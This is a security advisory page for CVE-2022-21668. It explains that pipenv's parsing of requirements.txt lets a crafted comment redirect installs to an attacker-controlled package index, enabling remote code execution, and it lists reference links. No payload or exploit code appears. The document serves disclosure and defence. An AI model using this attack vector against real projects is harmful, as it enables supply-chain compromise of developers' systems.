CVE-2022-21668: Pipenv's requirements.txt parsing allows malicious index url in comments
(updated )
Due to a flaw in pipenv’s parsing of requirements files, an attacker can insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file (e.g. with “pipenv install -r requirements.txt”) to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims’ systems.
References
- github.com/advisories/GHSA-qc9x-gjcv-465w
- github.com/pypa/advisory-database/tree/main/vulns/pipenv/PYSEC-2022-6.yaml
- github.com/pypa/pipenv
- github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f
- github.com/pypa/pipenv/releases/tag/v2022.1.8
- github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/56HBA3EOSLEDNCCBJVHE6DO34P56EOUM
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KCROBYHUS6DKQPCXBRPCZ5CDBNQTYAWT
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QHQRIWKDP3SVJABAPEXBIQPKDI6UP7G4
- nvd.nist.gov/vuln/detail/CVE-2022-21668
Detect and mitigate CVE-2022-21668 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →